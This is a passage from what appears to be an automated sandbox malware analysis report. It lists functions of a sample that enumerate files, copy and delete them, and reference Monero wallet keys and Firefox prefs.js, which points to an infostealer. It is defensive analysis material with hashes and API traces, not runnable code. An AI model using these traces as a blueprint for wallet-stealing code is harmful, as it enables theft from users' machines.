                                • Instruction Fuzzy Hash: 054245729001085BCB18FB70DD56EED73BDEF44300F44556AF90AB6281EE359B4ACB92
                                Function 00ED4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ED492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                • StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                • FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction ID: 9734229a052d8aaf151efa658316acde7dc0cb62b3e78b5783cd95bc4124d8ef
                                • Opcode Fuzzy Hash: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction Fuzzy Hash: 016165B1900218ABCB35EBA0EC45FEA73BCFF58301F048599B509A6145EB71DB85CF91
                                Function 00ED4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                • wsprintfA.USER32 ref: 00ED45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                • StrCmpCA.SHLWAPI(?,00EE0FC4), ref: 00ED45EB
                                • StrCmpCA.SHLWAPI(?,00EE0FC8), ref: 00ED4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED468B
                                • FindClose.KERNEL32(000000FF), ref: 00ED46A0
                                • lstrcat.KERNEL32(?,00DAE9E0), ref: 00ED46C5
                                • lstrcat.KERNEL32(?,00DAD5F0), ref: 00ED46D8
                                • lstrlen.KERNEL32(?), ref: 00ED46E5
                                • lstrlen.KERNEL32(?), ref: 00ED46F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 8e110c0e155904c6ed6ac5b110f814982b4ea7d637261d94e6acfabe1b5c9c69
                                • Instruction ID: 6a47af1b0982da7e60de7ab711326ecdbbb2d2cdfe70f0620c11e4b58d58c233
                                • Opcode Fuzzy Hash: 8e110c0e155904c6ed6ac5b110f814982b4ea7d637261d94e6acfabe1b5c9c69
                                • Instruction Fuzzy Hash: DE5162B69003189BC725EB70EC89FE9737CEF58300F405599B61AA2184EBB59BC5CF91
                                Function 00ED3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ED3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED3EDA
                                • StrCmpCA.SHLWAPI(?,00EE0FAC), ref: 00ED3F08
                                • StrCmpCA.SHLWAPI(?,00EE0FB0), ref: 00ED3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED406C
                                • FindClose.KERNEL32(000000FF), ref: 00ED4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: fdf20b9c3c919144a30d032d9dcff906b6626ef03940131242ce9ac515839b20
                                • Instruction ID: 0e78bac920c929196d840b64c1d3d9e4beb4a2955d4e7746184db4b5081b108e
                                • Opcode Fuzzy Hash: fdf20b9c3c919144a30d032d9dcff906b6626ef03940131242ce9ac515839b20
                                • Instruction Fuzzy Hash: BC5176B6900318ABCB25EBB0DC45EEA73BCFF48300F005599B659A2140DBB5DB86CF51
                                Function 00ECED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ECED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ECED55
                                • StrCmpCA.SHLWAPI(?,00EE1538), ref: 00ECEDAB
                                • StrCmpCA.SHLWAPI(?,00EE153C), ref: 00ECEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECF2AE
                                • FindClose.KERNEL32(000000FF), ref: 00ECF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
                                • Instruction ID: a0743fd4dc46d0b47ddf9163b7f4efc57e77b04865a998cc490efd27e83e5b86
                                • Opcode Fuzzy Hash: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
                                • Instruction Fuzzy Hash: 75E130769112589ADB18EB20DC96EEE7378EF54300F4451BAB40A72152EE306F8BDF51
                                Function 00ECF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
                                • StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
                                • StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00ECFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
                                • Instruction ID: 65236e63a33b0e2d27d793cf8d4d25fe38795ec1eaff8c7870f8758367641d1e
                                • Opcode Fuzzy Hash: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
                                • Instruction Fuzzy Hash: 1FB135769002589BCB28EF60DD55FED73B9EF54300F4491BAE80AA7241EF315B4ACB91
                                Function 00EC16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE510C,?,?,?,00EE51B4,?,?,00000000,?,00000000), ref: 00EC1923
                                • StrCmpCA.SHLWAPI(?,00EE525C), ref: 00EC1973
                                • StrCmpCA.SHLWAPI(?,00EE5304), ref: 00EC1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EC1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC1E20
                                • FindClose.KERNEL32(000000FF), ref: 00EC1E32
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: f746f92d5edc82eaeb8a5808f0a27af0cd781bd20682a7c0b85150caad0dde50
                                • Instruction ID: c9096b47d3783d2bc713f90d7ea694eec2d372e3cf2feff0611045fd92179127
                                • Opcode Fuzzy Hash: f746f92d5edc82eaeb8a5808f0a27af0cd781bd20682a7c0b85150caad0dde50
                                • Instruction Fuzzy Hash: 181231769101589ACB19EB60DC96EED73B8EF54300F4461BAB50A72191EF306F8BCF91
                                Function 00ECDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EE0C2E), ref: 00ECDE5E
                                • StrCmpCA.SHLWAPI(?,00EE14C8), ref: 00ECDEAE
                                • StrCmpCA.SHLWAPI(?,00EE14CC), ref: 00ECDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECE3E0
                                • FindClose.KERNEL32(000000FF), ref: 00ECE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: bb1eb85263f68aab727d043d5634c86c380ce530658672af4387d8bc9c1f4db9
                                • Instruction ID: 3748cfaf016f3ca76f32540edd51a3262a1b10dd1350c7492f4a25cbde6fd077
                                • Opcode Fuzzy Hash: bb1eb85263f68aab727d043d5634c86c380ce530658672af4387d8bc9c1f4db9
                                • Instruction Fuzzy Hash: 52F11F768101589ACB19EB60DC95EEE7378FF54300F8461FAA41A72191EF306B8BDF51
                                Function 00ECDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE14B0,00EE0C2A), ref: 00ECDAEB
                                • StrCmpCA.SHLWAPI(?,00EE14B4), ref: 00ECDB33
                                • StrCmpCA.SHLWAPI(?,00EE14B8), ref: 00ECDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECDDCC
                                • FindClose.KERNEL32(000000FF), ref: 00ECDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
                                • Instruction ID: 99e495fc0f6de208d5765e73f6499cfcd9b07fe5bb3a0e766d9373c40cd950b4
                                • Opcode Fuzzy Hash: a10383a7fb0481d49da0b7858fa06cb904598ce5447aab15491addc5823435ae
                                • Instruction Fuzzy Hash: 0691457290020457CB14FF70ED56EED73BDEF84300F44967AB81AB6241EE759B4A8B92
                                Function 01280DD6 Relevance: 12.9, Strings: 9, Instructions: 1624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "w.$ *F5$!Wo$B[{$\+_?$u'c7$~KDY$*ns$h{C
                                • API String ID: 0-961883834
                                • Opcode ID: 5a770438cf0ee95cd4e1cb30b091f7b4155602c0919fa84658a03904f6e0a27a
                                • Instruction ID: f52f1e41f17147c47ba4fc6905bfd04bca30a61e19714891a6b304a041008d95
                                • Opcode Fuzzy Hash: 5a770438cf0ee95cd4e1cb30b091f7b4155602c0919fa84658a03904f6e0a27a
                                • Instruction Fuzzy Hash: 6BB226F3A0C2009FE7046E2DEC9567AB7EAEFD4320F1A493DE6C5C7344EA7558058692
                                Function 00ED7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00EE05AF), ref: 00ED7BE1
